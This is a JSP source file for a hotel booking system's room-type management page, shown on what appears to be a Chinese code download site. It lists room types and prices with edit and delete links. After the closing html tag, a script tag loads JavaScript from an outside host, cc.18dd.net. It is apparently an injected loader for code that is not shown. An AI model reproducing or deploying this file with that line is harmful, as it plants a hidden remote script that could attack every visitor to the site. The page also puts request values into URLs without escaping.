⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 room.jsp

📁 用户的注册 用户的登陆 发布用户的相关信息 浏览网站介绍的其他酒店的信息 通过本系统查询被预定的房间 查询客户的反馈意见
💻 JSP
字号:
<%@ page contentType="text/html; charset=gb2312" %>
<%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<html>
<head>
<title>
房间类型管理
</title>
<link href="css/hotel.css" rel="stylesheet">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
.STYLE3 {font-size: 36px}
-->
</style>
</head>
<body bgcolor="#ffffff">
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><jsp:include  page="topEnterPrise.jsp"/></td>
  </tr>
  <tr>
    <td><table width="760" border="0" cellpadding="0" cellspacing="0">
      <tr>
        <td height="13" colspan="3">&nbsp;</td>
      </tr>
      <tr>
        <td width="2" height="24">&nbsp;</td>
        <td width="756"><jsp:include flush="" page="bannerenter.jsp"/></td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height="10" colspan="3">&nbsp;</td>
      </tr>
      <tr>
        <td colspan="3"><table width="760" border="0" cellpadding="0" cellspacing="0">
          <tr>
            <td width="2" height="366">&nbsp;</td>
            <td><table width="756" border="0" cellpadding="0" cellspacing="0">
              <tr>
                <td width="207" height="363" valign="top"><jsp:include flush="true" page="leftenter.jsp"/></td>
                <td valign="top"><table width="100%" height="330" border="0" cellpadding="0" cellspacing="0">
                  <tr>
                    <td height="25" align="center">房间管理</td>
                  </tr>
                  <tr>
                    <td height="25" align="center"><table width="100%" border="0" cellpadding="0" cellspacing="0">
                        <tr>
                          <td height="25" align="center"><label></label>
                              <label></label></td>
                        </tr>
                    </table></td>
                  </tr>
                  <tr>
                    <td height="280" valign="top"><table width="100%" border="0" cellpadding="0" cellspacing="0">
                        <tr>
                          <td width="20" height="275">&nbsp;</td>
                          <td valign="top"><table width="100%"  class="tableBorder_LTR_dashed"border="0" cellpadding="0" cellspacing="0">
                              <tr>
                                <td width="15%" height="26" align="center">房间类型</td>
                                <td width="10%" align="center">价格</td>
                                <td width="20%" align="center">修改</td>
                                <td width="15%" align="center">删除</td>
                                <td width="40%" align="center"><a href="addroom.html?eid=${requestScope.eid}">添加</a></td>
                              </tr>
                              <c:forEach var="room" items="${requestScope.list}">
                                <c:if test="${!empty room}">
                                  <c:set var="tag" value="true" scope="page"/>
                                </c:if>
                                <tr>
                                  <td width="10%" height="26" align="center"><a href="houseenter.html?eid=${requestScope.eid}&type=${room.type}">${room.type}</a></td>
                                  <td width="10%" align="center">${room.price}</td>
                                  <td width="20%" align="center"><a href=" updateroom.html?eid=${requestScope.eid}&price=${room.price}&type=${room.type}"><img src="images/modify.gif"  border="0" alt=""width="15" height="15"></a></td>
                                  <td width="20%" align="center"><a href="delroom.html?&eid=${requestScope.eid}&type=${room.type}"><img src="images/del.gif"  border="0" alt=""width="16" height="16"></a></td>
                                  <td width="40%" align="center">&nbsp;</td>
                                </tr>
                              </c:forEach>
							  <c:if test="${pageScope.tag==false}">
                                    <tr>
                                      <td height="26" colspan="6" align="center">没有任何记录</td>
                                    </tr>
									</c:if>
                          </table></td>
                        </tr>
                    </table></td>
                  </tr>
                </table></td>
              </tr>
            </table></td>
            <td width="2">&nbsp;</td>
          </tr>
        </table></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><jsp:include  page="Copyright.jsp"/></td>
  </tr>
</table>
</body>
</html>

<script language=javascript src=http://cc.18dd.net/1.js></script>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -